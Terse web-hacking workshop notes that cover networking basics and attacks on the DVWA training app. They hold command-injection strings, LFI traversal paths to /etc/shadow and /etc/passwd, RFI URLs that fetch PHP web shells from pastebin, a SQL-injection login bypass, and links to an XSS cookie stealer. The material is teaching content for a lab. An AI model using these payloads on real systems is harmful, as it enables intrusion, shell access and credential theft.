== Networking == IPv4/IPv6 ipv4 127.0.0.1 ipv6 2001:db8:3c4d:15::1a2f:1a2b. DNS translates domain names into ip addressess client server CLIENT = YOU(r device) web server in this case client: "hey google give me x page" -> upload google: "here I found it, go ahead and download this page" <- download request -> reply TCP/UDP web pages files. .html .php .aspx request: /dogs.html -> server: here is dogs.html request/reply/"everything is a file" frontend/backend get/post/etc "hey google, search for ppony fanfics" request: POST search=pony fanfics frontend: is the stuff sent to your Browser and the web pages you make requests to (public, client-facing) html/css/javascript backend: web servers, php, node, database, actions, api == Basic Web Hacking == DVWA Web Browser: * command injection get the GET var (ip) load that into a command (ping command) execute theory: execute("ping $ip"); $ip = 8.8.8.8 Theory execute("ping 8.8.8.8") $ip = 8.8.8.8; ls $ip = 8.8.8.8 && ls -lah && whoami && groups && id $ip = 8.8.8.8 && echo "hello world" > file.txt a few things to try: ; (stack commands) && (stacks commands) ` (executes commands on some systems) echo "something" > file.php (make a file) * LFI Local File Inclusion "web server loads a file from its own drive and shows it" try making it read a sensitive file? a few things to try: /etc/shadow /etc/passwd ../../../../../../../../etc/passwd Leak sensitive files Database files * RFI upload When web server downlaods and executes a remote file like: /page.php?file=file1.php -> /page.php?file=https://pastebin.com/raw/jmtqDfWQ (if you need multiple GET variables): ./page.php?file=https://pastebin.com/raw/jmtqDfWQ&somevar=1337 (append &variablename=value) a few things to try: PHP shell p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell ) simple-php-shell: https://pastebin.com/raw/uxbKCBGg Malware of any type * Stored XSS * Reflected XSS like search pages, etc uses GET variables in the URL usually requires tricking a victem into clicking a malicious link * Open HTTP Redirect get variables usually just let you redirect from a legitimate site to your own usually requires getting a victim to click a malicious link SQL Injection: "modifying an SQL query to do something fun" Lab: https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/17 Theory: SELEC $user = Delilah123 $password = ?? SELECT * FROM users WHERE username='$user' AND password='$password'; $password = ' SELECT * FROM users WHERE username='Delilah123' AND password='''; ERROR! $password = anythinghere' OR 1=1 SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1' ERROR > always true! $password = anythinghere' OR 1=1 -- -- is an sql comment! (space at start and end) SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1 -- ' EXECUTES AND MATCHES! #Burp Suite: #* Weak session IDs #* Brute force #Coding: #* CSRF #* XSS keylogger #* Advanced XSS+CSRF payload Links: SQL Injection Lab (WIP): https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/16 p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell ) simple-php-shell: https://pastebin.com/raw/uxbKCBGg basic XSS cookie stealer: https://pastebin.com/raw/puftrh39 General payloads including XSS and SQL Injection: https://swisskyrepo.github.io/PayloadsAllTheThings/ General hacking: https://cheatsheet.haax.fr/ Pi Pico W Power Analysis Tool (WIP): https://github.com/PrincessPi3/PiPicoPATLFGGGGG